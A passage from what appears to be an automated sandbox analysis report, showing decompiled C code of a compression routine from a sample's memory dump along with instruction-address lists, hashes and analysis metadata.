									 *(_t383 + 0x44) =  *(_t383 + 0x44) + 0xfffffff8;
								} while ( *(_t383 + 0x44) >= 8);
							}
						}
					} while (_t388 < _t337);
				}
				return _t297;
			}





























































                  0x00402f90
                  0x00402f94
                  0x00402fa3
                  0x00402faa
                  0x00402fb8
                  0x00402fbd
                  0x00402fc0
                  0x00402fc5
                  0x00402fcf
                  0x00402fd6
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00402fd6
                  0x00402fda
                  0x00402fdd
                  0x00402fde
                  0x00402fe8
                  0x00402fec
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00402fec
                  0x00402fee
                  0x00403000
                  0x00403019
                  0x00403024
                  0x00403026
                  0x0040302d
                  0x00403030
                  0x0040303b
                  0x00403041
                  0x00403044
                  0x0040304a
                  0x00403050
                  0x00403053
                  0x00403056
                  0x0040305d
                  0x00403062
                  0x004030eb
                  0x004030f0
                  0x004030f5
                  0x0040311e
                  0x00403134
                  0x0040313b
                  0x0040313e
                  0x00403120
                  0x00403120
                  0x00403127
                  0x0040312a
                  0x0040312a
                  0x00403146
                  0x0040314d
                  0x004030f7
                  0x004030f7
                  0x00403109
                  0x00403111
                  0x00403114
                  0x00403117
                  0x00403117
                  0x00403150
                  0x00403155
                  0x00403155
                  0x0040315a
                  0x004031cc
                  0x004031cd
                  0x004031d3
                  0x004031d5
                  0x004031dc
                  0x004031de
                  0x004031e8
                  0x00000000
                  0x004031e8
                  0x0040315c
                  0x0040315c
                  0x00403161
                  0x00403166
                  0x00403190
                  0x0040319a
                  0x004031a2
                  0x004031a9
                  0x00403168
                  0x0040316f
                  0x00403180
                  0x00403185
                  0x00403188
                  0x0040318b
                  0x0040318b
                  0x004031ae
                  0x004031ae
                  0x004031b4
                  0x004031bb
                  0x004031be
                  0x004031c6
                  0x004031c6
                  0x00403068
                  0x00403068
                  0x0040306d
                  0x00403072
                  0x00403099
                  0x004030a3
                  0x004030ab
                  0x004030b2
                  0x00403074
                  0x0040307b
                  0x0040308c
                  0x00403091
                  0x00403094
                  0x00403094
                  0x004030b7
                  0x004030b7
                  0x004030bd
                  0x004030c0
                  0x004030c1
                  0x004030ca
                  0x004030d0
                  0x004030d9
                  0x004030e3
                  0x004031eb
                  0x004031eb
                  0x004031eb
                  0x004030ca
                  0x004031f1
                  0x004031f4
                  0x004031fc
                  0x004031ff
                  0x004031ff
                  0x0040320a
                  0x00403253
                  0x00403258
                  0x0040327c
                  0x00403292
                  0x00403299
                  0x0040329c
                  0x0040327e
                  0x0040327e
                  0x00403285
                  0x00403288
                  0x00403288
                  0x004032a4
                  0x00000000
                  0x0040325a
                  0x0040325a
                  0x0040326c
                  0x00403271
                  0x00403274
                  0x00403274
                  0x00403258
                  0x0040320c
                  0x0040320f
                  0x00403236
                  0x00403240
                  0x00403248
                  0x004032ab
                  0x004032ab
                  0x00403211
                  0x00403218
                  0x00403229
                  0x0040322e
                  0x00403231
                  0x00403231
                  0x0040320f
                  0x0040320a
                  0x004032ae
                  0x004032af
                  0x004032b1
                  0x004032b5
                  0x004032ba
                  0x004032bf
                  0x004032c7
                  0x004032cc
                  0x004032cf
                  0x004032d2
                  0x004032d3
                  0x004032d8
                  0x004032da
                  0x004032da
                  0x004032e0
                  0x004032e5
                  0x004032e7
                  0x004032e7
                  0x004032ea
                  0x004032ee
                  0x004032f1
                  0x004032da
                  0x004032f6
                  0x00403303
                  0x00403306
                  0x00403309
                  0x0040330e
                  0x00403310
                  0x00403310
                  0x00403316
                  0x0040331b
                  0x0040331d
                  0x0040331d
                  0x00403320
                  0x00403324
                  0x00403327
                  0x00403310
                  0x0040332c
                  0x00403335
                  0x00403338
                  0x0040333b
                  0x00403340
                  0x00403342
                  0x00403342
                  0x00403348
                  0x0040334d
                  0x0040334f
                  0x0040334f
                  0x00403352
                  0x00403356
                  0x00403359
                  0x00403342
                  0x00403360
                  0x00403361
                  0x00403361
                  0x00403370
                  0x00000000
                  0x00000000
                  0x00403372
                  0x00403373
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00403373
                  0x00403375
                  0x0040337a
                  0x0040337d
                  0x00403380
                  0x00403383
                  0x0040338b
                  0x0040338e
                  0x00403391
                  0x00403396
                  0x00403398
                  0x00403398
                  0x0040339e
                  0x004033a0
                  0x004033a3
                  0x004033a5
                  0x004033a5
                  0x004033a8
                  0x004033ac
                  0x004033af
                  0x00403398
                  0x004033b4
                  0x004033b6
                  0x004033bb
                  0x004033bd
                  0x004033c0
                  0x004033c0
                  0x004033c7
                  0x004033d4
                  0x004033d7
                  0x004033da
                  0x004033e0
                  0x004033e2
                  0x004033e2
                  0x004033e8
                  0x004033ea
                  0x004033ed
                  0x004033ef
                  0x004033ef
                  0x004033f2
                  0x004033f6
                  0x004033fa
                  0x004033e2
                  0x00403400
                  0x00403401
                  0x00403405
                  0x00403405
                  0x00403409
                  0x0040340f
                  0x0040340f
                  0x00403417
                  0x00403418
                  0x0040341b
                  0x00403430
                  0x00403433
                  0x00403436
                  0x0040343c
                  0x0040343e
                  0x0040343e
                  0x00403444
                  0x00403449
                  0x0040344b
                  0x0040344b
                  0x0040344e
                  0x00403452
                  0x00403456
                  0x0040343e
                  0x0040345c
                  0x00403462
                  0x00403464
                  0x0040346c
                  0x00403474
                  0x00403477
                  0x0040347b
                  0x0040347e
                  0x00403484
                  0x00403486
                  0x00403486
                  0x0040348c
                  0x0040348e
                  0x00403491
                  0x00403493
                  0x00403493
                  0x00403496
                  0x0040349a
                  0x0040349e
                  0x00403486
                  0x00403484
                  0x004034a4
                  0x0040340f
                  0x004034b2

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: _memset$memset$memcpy
                  • String ID: 0HCw
                  • API String ID: 1551266493-3134391196
                  • Opcode ID: 2e1f4a3d71298718943c742f06d25169e691f0727c0f0a72c82688ee7d13fe6c
                  • Instruction ID: ca43e400cc7215004ac780a32a62955417f8f7f80a22650c2bf1bec3b8deea9e
                  • Opcode Fuzzy Hash: 2e1f4a3d71298718943c742f06d25169e691f0727c0f0a72c82688ee7d13fe6c
                  • Instruction Fuzzy Hash: 46024830900666EFCB16CF68C9C56EABF74FF45301F14017AC855A7782C73AAA25CB98
                  Uniqueness

                  Uniqueness Score: 100.00%

                  Function 004037A9, Relevance: 7.9, APIs: 3, Strings: 2, Instructions: 416UNIQUECrypto
                  Download Yara Rule
                  C-Code - Quality: 79%
                  			E004037A9(intOrPtr* __ecx, intOrPtr __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				int _v16;
				intOrPtr _v20;
				intOrPtr _t271;
				signed char _t279;
				intOrPtr _t283;
				intOrPtr _t291;
				signed int _t299;
				signed int _t300;
				signed char _t303;
				signed char _t306;
				signed char _t315;
				signed char _t324;
				signed char _t327;
				signed char _t333;
				signed int _t342;
				signed char _t344;
				signed char _t348;
				intOrPtr _t357;
				signed int _t358;
				void* _t359;
				void* _t362;
				intOrPtr _t363;
				signed char _t366;
				intOrPtr _t367;
				signed char _t370;
				signed char _t371;
				signed char _t372;
				char* _t373;
				char* _t374;
				char* _t375;
				signed char _t376;
				char* _t377;
				char* _t378;
				signed char _t382;
				signed char _t383;
				signed char _t384;
				char* _t385;
				char* _t386;
				char* _t387;
				char* _t388;
				char* _t393;
				signed char _t394;
				signed char _t395;
				char* _t396;
				char* _t397;
				intOrPtr _t398;
				int _t400;
				intOrPtr _t401;
				void* _t402;
				signed int _t403;
				signed int _t404;
				void* _t406;
				void* _t410;
				intOrPtr _t411;
				int _t414;
				void* _t415;
				signed char _t416;
				intOrPtr* _t417;

				_t417 = __ecx;
				_t357 = __edx;
				_v20 = __edx;
				_v16 = 0;
				if(( *(__ecx + 8) & 0x00080000) == 0 ||  *((intOrPtr*)(__ecx + 0x1c)) -  *((intOrPtr*)(__ecx + 0x40)) >  *((intOrPtr*)(__ecx + 0x24))) {
					_t400 = 0;
				} else {
					_t400 = 1;
				}
				if( *_t417 != 0) {
					L7:
					_t271 = _t417 + 0x39272;
					goto L8;
				} else {
					_t398 =  *((intOrPtr*)(_t417 + 0x8c));
					if( *((intOrPtr*)( *((intOrPtr*)(_t417 + 0x7c)))) - _t398 < 0x14ccc) {
						goto L7;
					} else {
						_t271 =  *((intOrPtr*)(_t417 + 0x74)) + _t398;
						L8:
						 *((intOrPtr*)(_t417 + 0x30)) = _t271;
						_v12 = _t271;
						 *((intOrPtr*)(_t417 + 0x34)) = _t271 + 0x14cbc;
						 *(_t417 + 0x58) = 0;
						 *((intOrPtr*)(_t417 + 0x5c)) = 0;
						 *( *(_t417 + 0x2c)) =  *( *(_t417 + 0x2c)) >>  *(_t417 + 0x38);
						_t410 = 8;
						 *((intOrPtr*)(_t417 + 0x28)) =  *((intOrPtr*)(_t417 + 0x28)) - (0 |  *(_t417 + 0x38) == _t410);
						if(( *(_t417 + 8) & 0x00001000) == 0 ||  *((intOrPtr*)(_t417 + 0x64)) != 0) {
							L18:
							_t366 =  *(_t417 + 0x44);
							 *(_t417 + 0x48) =  *(_t417 + 0x48) | (0 | _t357 == 0x00000004) << _t366;
							_t64 = _t366 + 1; // 0xf9
							_t279 = _t64;
							 *(_t417 + 0x44) = _t279;
							if(_t279 < _t410) {
								L22:
								_t411 =  *((intOrPtr*)(_t417 + 0x30));
								_t358 =  *(_t417 + 0x44);
								_v8 =  *(_t417 + 0x48);
								if(_t400 != 0) {
									_t401 = _v16;
									L47:
									if( *((intOrPtr*)(_t417 + 0x1c)) -  *((intOrPtr*)(_t417 + 0x40)) >  *((intOrPtr*)(_t417 + 0x24))) {
										L28:
										if(_t401 == 0) {
											_t87 =  &_v8; // 0x40473a
											 *(_t417 + 0x48) =  *_t87;
											 *((intOrPtr*)(_t417 + 0x30)) = _t411;
											 *(_t417 + 0x44) = _t358;
											E0040378E(_t417, _t401 + 1);
										}
										_t359 = 2;
										L31:
										_t283 = _v20;
										if(_t283 == 0) {
											L84:
											memset(_t417 + 0x8192, 0, 0x240);
											memset(_t417 + 0x83d2, 0, 0x40);
											 *(_t417 + 0x38) = 8;
											 *((intOrPtr*)(_t417 + 0x28)) = _t417 + 0x9273;
											 *(_t417 + 0x2c) = _t417 + 0x9272;
											 *((intOrPtr*)(_t417 + 0x40)) =  *((intOrPtr*)(_t417 + 0x40)) +  *(_t417 + 0x3c);
											 *((intOrPtr*)(_t417 + 0x64)) =  *((intOrPtr*)(_t417 + 0x64)) + 1;
											_t291 = _v12;
											 *(_t417 + 0x3c) = 0;
											_t362 =  *((intOrPtr*)(_t417 + 0x30)) - _t291;
											if(_t362 == 0) {
												L92:
												return  *((intOrPtr*)(_t417 + 0x5c));
											}
											if( *_t417 == 0) {
												_t402 = _t417 + 0x39272;
												if(_t291 != _t402) {
													 *((intOrPtr*)(_t417 + 0x8c)) =  *((intOrPtr*)(_t417 + 0x8c)) + _t362;
												} else {
													_t367 =  *((intOrPtr*)(_t417 + 0x8c));
													_t414 =  <  ? _t362 :  *((intOrPtr*)( *((intOrPtr*)(_t417 + 0x7c)))) - _t367;
													memcpy( *((intOrPtr*)(_t417 + 0x74)) + _t367, _t402, _t414);
													 *((intOrPtr*)(_t417 + 0x8c)) =  *((intOrPtr*)(_t417 + 0x8c)) + _t414;
													_t363 = _t362 - _t414;
													if(_t363 != 0) {
														 *(_t417 + 0x58) = _t414;
														 *((intOrPtr*)(_t417 + 0x5c)) = _t363;
													}
												}
												goto L92;
											}
											 *((intOrPtr*)( *((intOrPtr*)(_t417 + 0x78)))) =  *((intOrPtr*)(_t417 + 0x84)) -  *((intOrPtr*)(_t417 + 0x70));
											_t299 =  *_t417(_t417 + 0x39272, _t362,  *((intOrPtr*)(_t417 + 4)));
											if(_t299 != 0) {
												goto L92;
											}
											_t300 = _t299 | 0xffffffff;
											 *(_t417 + 0x6c) = _t300;
											return _t300;
										}
										_t370 =  *(_t417 + 0x44);
										_t415 = 4;
										if(_t283 != _t415) {
											_t403 = 0;
											 *(_t417 + 0x48) =  *(_t417 + 0x48) | 0 << _t370;
											_t303 = _t370 + 3;
											 *(_t417 + 0x44) = _t303;
											if(_t303 < 8) {
												L74:
												_t371 =  *(_t417 + 0x44);
												if(_t371 == 0) {
													do {
														L79:
														_t372 =  *(_t417 + 0x44);
														 *(_t417 + 0x48) =  *(_t417 + 0x48) | (_t403 & 0x0000ffff) << _t372;
														_t227 = _t372 + 0x10; // 0x18
														_t306 = _t227;
														 *(_t417 + 0x44) = _t306;
														if(_t306 < 8) {
															goto L83;
														} else {
															goto L80;
														}
														do {
															L80:
															_t373 =  *((intOrPtr*)(_t417 + 0x30));
															if(_t373 <  *((intOrPtr*)(_t417 + 0x34))) {
																 *_t373 =  *(_t417 + 0x48);
																 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
															}
															 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
															 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
														} while ( *(_t417 + 0x44) >= 8);
														L83:
														_t403 = _t403 ^ 0x0000ffff;
														_t359 = _t359 - 1;
													} while (_t359 != 0);
													goto L84;
												}
												 *(_t417 + 0x44) = 8;
												 *(_t417 + 0x48) =  *(_t417 + 0x48) | 0 << _t371;
												do {
													_t374 =  *((intOrPtr*)(_t417 + 0x30));
													if(_t374 <  *((intOrPtr*)(_t417 + 0x34))) {
														 *_t374 =  *(_t417 + 0x48);
														 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
													}
													 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
													 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
												} while ( *(_t417 + 0x44) >= 8);
												goto L79;
											} else {
												goto L71;
											}
											do {
												L71:
												_t375 =  *((intOrPtr*)(_t417 + 0x30));
												if(_t375 <  *((intOrPtr*)(_t417 + 0x34))) {
													 *_t375 =  *(_t417 + 0x48);
													 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
												}
												 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
												 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
											} while ( *(_t417 + 0x44) >= 8);
											goto L74;
										}
										if(_t370 == 0) {
											L38:
											if(( *(_t417 + 8) & 0x00001000) == 0) {
												goto L84;
											}
											_t404 =  *(_t417 + 0x18);
											do {
												_t376 =  *(_t417 + 0x44);
												 *(_t417 + 0x48) =  *(_t417 + 0x48) | _t404 >> 0x00000018 << _t376;
												_t113 = _t376 + 8; // 0x10
												_t315 = _t113;
												 *(_t417 + 0x44) = _t315;
												if(_t315 < 8) {
													goto L44;
												} else {
													goto L41;
												}
												do {
													L41:
													_t377 =  *((intOrPtr*)(_t417 + 0x30));
													if(_t377 <  *((intOrPtr*)(_t417 + 0x34))) {
														 *_t377 =  *(_t417 + 0x48);
														 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
													}
													 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
													 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
												} while ( *(_t417 + 0x44) >= 8);
												L44:
												_t404 = _t404 << 8;
												_t415 = _t415 - 1;
											} while (_t415 != 0);
											goto L84;
										}
										 *(_t417 + 0x44) = 8;
										 *(_t417 + 0x48) =  *(_t417 + 0x48) | 0 << _t370;
										do {
											_t378 =  *((intOrPtr*)(_t417 + 0x30));
											if(_t378 <  *((intOrPtr*)(_t417 + 0x34))) {
												 *_t378 =  *(_t417 + 0x48);
												 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
											}
											 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
											 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
										} while ( *(_t417 + 0x44) >= 8);
										goto L38;
									}
									 *((intOrPtr*)(_t417 + 0x30)) = _t411;
									_t130 =  &_v8; // 0x40473a
									 *(_t417 + 0x48) = 0 << _t358 |  *_t130;
									_t324 = _t358 + 2;
									_t416 = 8;
									 *(_t417 + 0x44) = _t324;
									if(_t324 < _t416) {
										L52:
										_t382 =  *(_t417 + 0x44);
										if(_t382 == 0) {
											L57:
											_t359 = 2;
											_t406 = _t359;
											do {
												_t383 =  *(_t417 + 0x44);
												 *(_t417 + 0x48) =  *(_t417 + 0x48) | ( *(_t417 + 0x3c) & 0x0000ffff) << _t383;
												_t162 = _t383 + 0x10; // 0x108
												_t327 = _t162;
												 *(_t417 + 0x44) = _t327;
												if(_t327 < _t416) {
													goto L62;
												} else {
													goto L59;
												}
												do {
													L59:
													_t386 =  *((intOrPtr*)(_t417 + 0x30));
													if(_t386 <  *((intOrPtr*)(_t417 + 0x34))) {
														 *_t386 =  *(_t417 + 0x48);
														 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
													}
													 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
													 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
												} while ( *(_t417 + 0x44) >= _t416);
												L62:
												 *(_t417 + 0x3c) =  *(_t417 + 0x3c) ^ 0x0000ffff;
												_t406 = _t406 - 1;
											} while (_t406 != 0);
											if( *(_t417 + 0x3c) <= _t406) {
												goto L31;
											} else {
												goto L64;
											}
											do {
												L64:
												_t384 =  *(_t417 + 0x44);
												 *(_t417 + 0x48) =  *(_t417 + 0x48) | ( *(( *((intOrPtr*)(_t417 + 0x40)) + _t406 & 0x00007fff) + _t417 + 0x90) & 0x000000ff) << _t384;
												_t183 = _t384 + 8; // 0x100
												_t333 = _t183;
												 *(_t417 + 0x44) = _t333;
												if(_t333 < _t416) {
													goto L68;
												} else {
													goto L65;
												}
												do {
													L65:
													_t385 =  *((intOrPtr*)(_t417 + 0x30));
													if(_t385 <  *((intOrPtr*)(_t417 + 0x34))) {
														 *_t385 =  *(_t417 + 0x48);
														 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
													}
													 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
													 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
												} while ( *(_t417 + 0x44) >= _t416);
												L68:
												_t406 = _t406 + 1;
											} while (_t406 <  *(_t417 + 0x3c));
											goto L31;
										}
										 *(_t417 + 0x44) = _t416;
										 *(_t417 + 0x48) =  *(_t417 + 0x48) | 0 << _t382;
										do {
											_t387 =  *((intOrPtr*)(_t417 + 0x30));
											if(_t387 <  *((intOrPtr*)(_t417 + 0x34))) {
												 *_t387 =  *(_t417 + 0x48);
												 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
											}
											 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
											 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
										} while ( *(_t417 + 0x44) >= _t416);
										goto L57;
									} else {
										goto L49;
									}
									do {
										L49:
										_t388 =  *((intOrPtr*)(_t417 + 0x30));
										if(_t388 <  *((intOrPtr*)(_t417 + 0x34))) {
											 *_t388 =  *(_t417 + 0x48);
											 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
										}
										 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
										 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
									} while ( *(_t417 + 0x44) >= _t416);
									goto L52;
								}
								if(( *(_t417 + 8) & 0x00040000) != 0 ||  *(_t417 + 0x3c) < 0x30) {
									_t400 = 1;
								}
								_t401 = E0040378E(_t417, _t400);
								if( *(_t417 + 0x3c) == 0 ||  *((intOrPtr*)(_t417 + 0x30)) - _t411 + 1 <  *(_t417 + 0x3c)) {
									goto L28;
								} else {
									goto L47;
								}
							} else {
								goto L19;
							}
							do {
								L19:
								_t393 =  *((intOrPtr*)(_t417 + 0x30));
								if(_t393 <  *((intOrPtr*)(_t417 + 0x34))) {
									 *_t393 =  *(_t417 + 0x48);
									 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
								}
								 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
								 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
							} while ( *(_t417 + 0x44) >= _t410);
							goto L22;
						} else {
							_t394 =  *(_t417 + 0x44);
							_t342 = 0x78;
							 *(_t417 + 0x48) =  *(_t417 + 0x48) | _t342 << _t394;
							_t344 = _t394 + 8;
							 *(_t417 + 0x44) = _t344;
							if(_t344 < _t410) {
								L14:
								_t395 =  *(_t417 + 0x44);
								 *(_t417 + 0x48) =  *(_t417 + 0x48) | 1 << _t395;
								_t47 = _t395 + 8; // 0x100
								_t348 = _t47;
								 *(_t417 + 0x44) = _t348;
								if(_t348 < _t410) {
									goto L18;
								} else {
									goto L15;
								}
								do {
									L15:
									_t396 =  *((intOrPtr*)(_t417 + 0x30));
									if(_t396 <  *((intOrPtr*)(_t417 + 0x34))) {
										 *_t396 =  *(_t417 + 0x48);
										 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
									}
									 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
									 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
								} while ( *(_t417 + 0x44) >= _t410);
								goto L18;
							} else {
								goto L11;
							}
							do {
								L11:
								_t397 =  *((intOrPtr*)(_t417 + 0x30));
								if(_t397 <  *((intOrPtr*)(_t417 + 0x34))) {
									 *_t397 =  *(_t417 + 0x48);
									 *((intOrPtr*)(_t417 + 0x30)) =  *((intOrPtr*)(_t417 + 0x30)) + 1;
								}
								 *(_t417 + 0x48) =  *(_t417 + 0x48) >> 8;
								 *(_t417 + 0x44) =  *(_t417 + 0x44) + 0xfffffff8;
							} while ( *(_t417 + 0x44) >= _t410);
							goto L14;
						}
					}
				}
			}































































                  0x004037b1
                  0x004037b3
                  0x004037b8
                  0x004037bb
                  0x004037c5
                  0x004037d7
                  0x004037d2
                  0x004037d4
                  0x004037d4
                  0x004037db
                  0x004037f8
                  0x004037f8
                  0x00000000
                  0x004037dd
                  0x004037e0
                  0x004037ef
                  0x00000000
                  0x004037f1
                  0x004037f4
                  0x004037fe
                  0x00403801
                  0x00403804
                  0x0040380c
                  0x00403812
                  0x00403815
                  0x0040381a
                  0x0040381e
                  0x00403825
                  0x0040382f
                  0x0040389b
                  0x0040389b
                  0x004038a8
                  0x004038ab
                  0x004038ab
                  0x004038ae
                  0x004038b3
                  0x004038d2
                  0x004038d5
                  0x004038d8
                  0x004038db
                  0x004038e0
                  0x004039cb
                  0x004039ce
                  0x004039d7
                  0x00403916
                  0x00403918
                  0x0040391a
                  0x0040391e
                  0x00403923
                  0x00403926
                  0x00403929
                  0x00403929
                  0x00403930
                  0x00403931
                  0x00403931
                  0x00403936
                  0x00403b7d
                  0x00403b8c
                  0x00403b9c
                  0x00403ba8
                  0x00403baf
                  0x00403bbb
                  0x00403bc1
                  0x00403bc4
                  0x00403bc7
                  0x00403bca
                  0x00403bd0
                  0x00403bd2
                  0x00403c48
                  0x00000000
                  0x00403c48
                  0x00403bd7
                  0x00403c03
                  0x00403c0b
                  0x00403c42
                  0x00403c0d
                  0x00403c10
                  0x00403c1f
                  0x00403c27
                  0x00403c2d
                  0x00403c36
                  0x00403c38
                  0x00403c3a
                  0x00403c3d
                  0x00403c3d
                  0x00403c38
                  0x00000000
                  0x00403c0b
                  0x00403be5
                  0x00403bf2
                  0x00403bf9
                  0x00000000
                  0x00000000
                  0x00403bfb
                  0x00403bfe
                  0x00000000
                  0x00403bfe
                  0x0040393c
                  0x00403941
                  0x00403944
                  0x00403add
                  0x00403ae1
                  0x00403ae4
                  0x00403ae7
                  0x00403aed
                  0x00403b0d
                  0x00403b0d
                  0x00403b12
                  0x00403b40
                  0x00403b40
                  0x00403b40
                  0x00403b48
                  0x00403b4b
                  0x00403b4b
                  0x00403b4e
                  0x00403b54
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00403b56
                  0x00403b56
                  0x00403b56
                  0x00403b5c
                  0x00403b61
                  0x00403b63
                  0x00403b63
                  0x00403b66
                  0x00403b6a
                  0x00403b6e
                  0x00403b74
                  0x00403b74
                  0x00403b7a
                  0x00403b7a
                  0x00000000
                  0x00403b40
                  0x00403b16
                  0x00403b1f
                  0x00403b22
                  0x00403b22
                  0x00403b28
                  0x00403b2d
                  0x00403b2f
                  0x00403b2f
                  0x00403b32
                  0x00403b36
                  0x00403b3a
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00403aef
                  0x00403aef
                  0x00403aef
                  0x00403af5
                  0x00403afa
                  0x00403afc
                  0x00403afc
                  0x00403aff
                  0x00403b03
                  0x00403b07
                  0x00000000
                  0x00403aef
                  0x0040394c
                  0x0040397a
                  0x00403981
                  0x00000000
                  0x00000000
                  0x00403987
                  0x0040398a
                  0x0040398a
                  0x00403994
                  0x00403997
                  0x00403997
                  0x0040399a
                  0x004039a0
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004039a2
                  0x004039a2
                  0x004039a2
                  0x004039a8
                  0x004039ad
                  0x004039af
                  0x004039af
                  0x004039b2
                  0x004039b6
                  0x004039ba
                  0x004039c0
                  0x004039c0
                  0x004039c3
                  0x004039c3
                  0x00000000
                  0x004039c6
                  0x00403950
                  0x00403959
                  0x0040395c
                  0x0040395c
                  0x00403962
                  0x00403967
                  0x00403969
                  0x00403969
                  0x0040396c
                  0x00403970
                  0x00403974
                  0x00000000
                  0x0040395c
                  0x004039df
                  0x004039e6
                  0x004039eb
                  0x004039ee
                  0x004039f1
                  0x004039f2
                  0x004039f7
                  0x00403a16
                  0x00403a16
                  0x00403a1b
                  0x00403a44
                  0x00403a46
                  0x00403a47
                  0x00403a49
                  0x00403a49
                  0x00403a52
                  0x00403a55
                  0x00403a55
                  0x00403a58
                  0x00403a5d
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00403a5f
                  0x00403a5f
                  0x00403a5f
                  0x00403a65
                  0x00403a6a
                  0x00403a6c
                  0x00403a6c
                  0x00403a6f
                  0x00403a73
                  0x00403a77
                  0x00403a7c
                  0x00403a7c
                  0x00403a83
                  0x00403a83
                  0x00403a89
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00403a8f
                  0x00403a8f
                  0x00403a92
                  0x00403aa6
                  0x00403aa9
                  0x00403aa9
                  0x00403aac
                  0x00403ab1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00403ab3
                  0x00403ab3
                  0x00403ab3
                  0x00403ab9
                  0x00403abe
                  0x00403ac0
                  0x00403ac0
                  0x00403ac3
                  0x00403ac7
                  0x00403acb
                  0x00403ad0
                  0x00403ad0
                  0x00403ad1
                  0x00000000
                  0x00403ad6
                  0x00403a1f
                  0x00403a24
                  0x00403a27
                  0x00403a27
                  0x00403a2d
                  0x00403a32
                  0x00403a34
                  0x00403a34
                  0x00403a37
                  0x00403a3b
                  0x00403a3f
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004039f9
                  0x004039f9
                  0x004039f9
                  0x004039ff
                  0x00403a04
                  0x00403a06
                  0x00403a06
                  0x00403a09
                  0x00403a0d
                  0x00403a11
                  0x00000000
                  0x004039f9
                  0x004038ed
                  0x004038f7
                  0x004038f7
                  0x00403903
                  0x00403905
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004038b5
                  0x004038b5
                  0x004038b5
                  0x004038bb
                  0x004038c0
                  0x004038c2
                  0x004038c2
                  0x004038c5
                  0x004038c9
                  0x004038cd
                  0x00000000
                  0x00403837
                  0x00403837
                  0x0040383c
                  0x0040383f
                  0x00403842
                  0x00403845
                  0x0040384a
                  0x00403869
                  0x00403869
                  0x00403871
                  0x00403874
                  0x00403874
                  0x00403877
                  0x0040387c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040387e
                  0x0040387e
                  0x0040387e
                  0x00403884
                  0x00403889
                  0x0040388b
                  0x0040388b
                  0x0040388e
                  0x00403892
                  0x00403896
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x0040384c
                  0x0040384c
                  0x0040384c
                  0x00403852
                  0x00403857
                  0x00403859
                  0x00403859
                  0x0040385c
                  0x00403860
                  0x00403864
                  0x00000000
                  0x0040384c
                  0x0040382f
                  0x004037ef

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.296478770.00400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000005.00000002.296529342.00417000.00000040.00000001.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_400000_982.jbxd
                  Yara matches
                  Similarity
                  • API ID: memset$memcpy
                  • String ID: 0HCw$:G@
                  • API String ID: 368790112-2591896426
                  • Opcode ID: 3df911d3bb229b9e5b5053eb572e8c057e61aac1366dbd8753bf5e6acc202186
                  • Instruction ID: bff9ad06bf82d853f9c70daa61a207c77b125d2d5e3c741b47fcf7fead7e8f56
